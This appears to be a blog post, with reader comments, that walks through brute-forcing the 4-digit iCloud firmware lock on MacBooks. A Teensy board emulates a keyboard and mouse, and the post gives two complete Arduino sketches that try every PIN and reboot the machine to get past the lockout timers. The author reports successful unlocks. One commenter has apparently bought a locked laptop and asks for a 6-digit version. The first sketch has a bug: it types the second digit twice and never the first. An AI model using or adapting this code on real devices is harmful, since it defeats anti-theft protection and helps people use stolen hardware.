“No security is better than lame security” – Ray Biez circa 1998
Apple, for all their self-congratulatory PR that fills mainstream media, is privately (in)famous for, well, piss-poor security. It’s harder to remove the OS password from a Windows PC – even one running XP – than it is to do the same on even the latest Mac/MacBook. Ok, it’s not exactly rocket science to remove the user security from either, but you do need more than just your fingers to bust the Windows security.
iCloud is Apple’s offering to secure users hardware in case of loss/theft, a multi-faceted product that covers hardware running both Apple operating systems – OSX and iOS. Although it’s a highly vaunted product, they’ve taken a long time to perfect the iOS version – previous to iOS 7.1.1 it’s not too hard to break that thing off. (Using only your fingers.)
And the OSX version, oh boy.
That’s like a combination lock there, takes 4 digits to unlock it. So let me work this out – 0000 is the lowest possible code, while 9999 is the highest. And if it’s not either of those two, then somewhere in between is your answer. A rather trivial total of just 10,000 possible combinations. Given enough time & patience, this can even be done manually – eventually you’ll type the correct sequence.
Fuck that, manually typing 100 combinations would piss me off. I know, let’s use science & technology! The micro-controller industry has given us a bunch of tiny component-style silicon boards, capable of just a specific task or two. Teensy 3.1 is an Arduino-like board that can be programmed to emulate a USB keyboard & mouse. Here’s the one I received today:
Plug it in via micro-USB – see the glowing light, it lives!
So, hunt down a Teensy 3.1 via your local Googles. Mine was delivered overnight for $NZ41 incl postage. Download and install the Arduino & the TeensyDuino SDK software, which includes the two required libraries – USB_keyboard.h & USB_mouse.h. Copy these two files to a project folder, to where you’ll add the magic code before compiling. The SDK is available in OSX, Windows & Linux variants.
Next you need to either write the code from scratch or source pre-compiled code that’ll do the consecutive number entry we require (with some additional variation in the routine to circumvent Apple’s minor multiple entry time lock defence.)
You’ll find two proven choices, Orvtech and Knoy. I’ve used both, right now – at this very minute in fact, Knoy’s version for the 15″ MacBook Pro is chugging away next to me. I’m not so sure about the Knoy codebase, but since it’s a 5 minute procedure to reprogram the Teensy, the Orvtech code can run on the MacBook Pro if there’s no result from the Knoy compile. The Knoy code runs quicker as it invokes restarts more often than the Orvtech solution. Having said that, Orvtech worked for me last time.
UPDATE: I don’t know why but the Knoy Arduino solution failed. I gave it two machines to play with, parked them in a cupboard & left them alone for 2-3 days each. Both times I returned to find a dark screen, pre-booting the lock screen with the Teensy 3 flashing fast & bright.
So I’ve re-coded with an enhanced version of the Orvtech script –
#include <usb_keyboard.h>
const int ledPin = 13;
int counter = 0;
//waits for iCloud
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(30000);
}
void loop(){
keyboard_modifier_keys = 0;
//lets wait 1 minute and 1 second
if (loops == 5){
delay(63000);
}
//lets wait 5 minutes and one second
else if (loops == 6){
delay(301000);
}
//lets wait 15 minutes and 1 second
else if (loops == 7){
delay(901000);
loops = 0;
}
//lets get to work
if (counter <= 9999){
delay(1500);
digitalWrite(ledPin, LOW);
delay(800);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
Keyboard.press(pin[1]);
delay(450);
Keyboard.release(pin[1]);
delay(420);
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
++loops;
fakecounter = counter;
}
Running this code against the iCloud block (iCloud lock is an overstatement) is a simple process. Plug yer Teensy in, boot the Mac, kick back & wait. It takes about 17 seconds per entry, averaged, including restarts to circumvent the multiple-entry hurdle. Time til breakthrough is dependent upon where in the range the code is, but expect the tell-tale “dong” success tone within 72 hours. But hey, if the iCloud code was set at a low number, say 0XXX, then hang around for an hour or so cos your answer is on its’ way.
iCloud cracker in action
The practicalities of this code are not extensive. It’s more an application in slow, methodical cracking than any brilliant invocation of a hi-tech algorithm. There is no salted hash to track down and crack, it’s just a simple exercise in orderly, automated data entry (that a patient human can also do. Or a monkey, a well-trained monkey.)
There aren’t, seemingly, that many Mac computers utilising iCloud protection. I think it’s a far better idea to keep your Apple product out of harms way, locked down & tucked away safely. That, and insured. Keep your Mac backed up (data insurance) and commercially insured.
UPDATE: I got sick of wait, wait, waiting for the Orvtech solution to show me the money. I can’t do unoptimised code, I just can’t. Digital is a direct thing, the shortest way between two points. So why sit round waiting for 15mins when a restart takes less than 2mins?
While I was waiting for the inefficient code to bumble its way through, I took a fresh look @ the Knoy compile – his code is offered for 15″ or 13″ MacBooks – made some minor adjustments of my own then rebuilt the Teensy & set it loose on a 2011 15″ MacBook Pro again.
#include <usb_keyboard.h>
#include <usb_mouse.h>
const int ledpin = 13;
int waitcounter = 0;
int guesscounter = 0; //Set your starting point here
char guess[5]="0000";
void resetMouse() { for(int i=0; i<6; i++) { Mouse.move(-127, 127); delay(200); } }
void moveMouse(int x, int y) { Mouse.move(x, y); delay(200); }
void pressKeyboard(int key) { Keyboard.press(key); delay(200); Keyboard.release(key); delay(500); }
void setup() {
pinMode(ledpin, OUTPUT);
keyboard_modifier_keys = 0;
delay(5000); // Wait for 5s before starting
resetMouse();
moveMouse(127, -127); // Move mouse over wifi popup and close it
moveMouse(127, -127);
moveMouse(127, 0);
Mouse.click(MOUSE_LEFT);
delay(500);
pressKeyboard(KEY_ESC);
delay(500);
Mouse.click(MOUSE_LEFT);
delay(200);
}
void loop(){
if(waitcounter == 5) delay(65000); // Hit 1 minute lockout, wait until we get another chance
else if(waitcounter == 6) { // Hit 5 minute lockout, let's reboot instead of waiting - I like this!
digitalWrite(ledpin, HIGH);
delay(20000); // Wait 20s before restarting in case we hit the right PIN
resetMouse(); // Move mouse over the restart button
moveMouse(127, -45);
moveMouse(127, 0);
moveMouse(127, 0);
Mouse.click(MOUSE_LEFT); // Click restart & wait for it to reboot
delay(95000);
resetMouse();
moveMouse(127, -45); // Move mouse over wifi popup and close it
moveMouse(127, -127);
moveMouse(127, 0);
Mouse.click(MOUSE_LEFT);
delay(500);
pressKeyboard(KEY_ESC);
delay(500);
Mouse.click(MOUSE_LEFT);
digitalWrite(ledpin, LOW);
waitcounter = -1;
}
waitcounter++;
if(guesscounter <= 9999) {
delay(1000); // Wait 1 second between entries
digitalWrite(ledpin, HIGH);
snprintf(guess, 6, "%04d", guesscounter);
pressKeyboard(guess[0]);
pressKeyboard(guess[1]);
pressKeyboard(guess[2]);
pressKeyboard(guess[3]);
pressKeyboard(KEY_RETURN);
digitalWrite(ledpin, LOW);
} else { // Flash LED continuously when we're done
while(true) {
digitalWrite(ledpin, HIGH);
delay(100);
digitalWrite(ledpin, LOW);
delay(100);
}
}
guesscounter++;
}
Three days in, somewhere past the 5000 mark the reboot chime halted – cracked it! To make sure it wasn’t a fluke, I immediately put a second MacBook Pro, same spec, up against the Teensy. Around 18 hours later, Ka-ching! Cracked it!
PS: Do not even think that your bright idea of reformatting the hard drive on an iCloud locked Mac will solve the puzzle far quicker than the system described above. It won’t. What it will do is increase the EFI lock code from 4 digits to 6, taking the cracking process from 3 days to around 7.5 months. Your best advice, if you are less than fully aware of Apple security, is to Step Away From The Keyboard – pay somebody who knows what they’re up to.
Hi,
Will this code work also on MacBook Air 13″ (mid 2013)?
Yeah, it certainly will.
As some one might lock ur computer on purpose (such as mine), he/it probably want the pin most difficult to guess out. So personally I think it should be better to randomly shift the whole array [0000 to 9999] then try cuz it’s highly possible he wont set pin like 0801 or 9014…etc
Hi,
It was intresting article. I have icloud locked Macbook pro ;i bought for just $300 . It is asking 6 digits unlock code. Can you help me to re-programme it for 6 digits. I have nt a
computer programmer .
thanxyou
I’m tempted to do what the MacBook Pro vendor did to you – sell you a useless item at a ridiculous price. If you’re that dumb, I figure you’d happily pay another $300 for an Arduino unlocker. (Which would work, but could take 6 months or more)
Why did you spend on an iCloud-locked MacBook Pro, especially when you’ve no knowledge of how to unlock? That would rank alongside the chocolate teapot as #1 most useless item ever purchased.
Is there anything else you’d like to buy? Cassette tape player? AGP Video card? Or should I get you to send your (it’s not really yours) MBPro to me? I promise to send it straight back!
(Peeps, this is fixable. Easily. Not by the USB solution though. Some knowledge is not for all people.)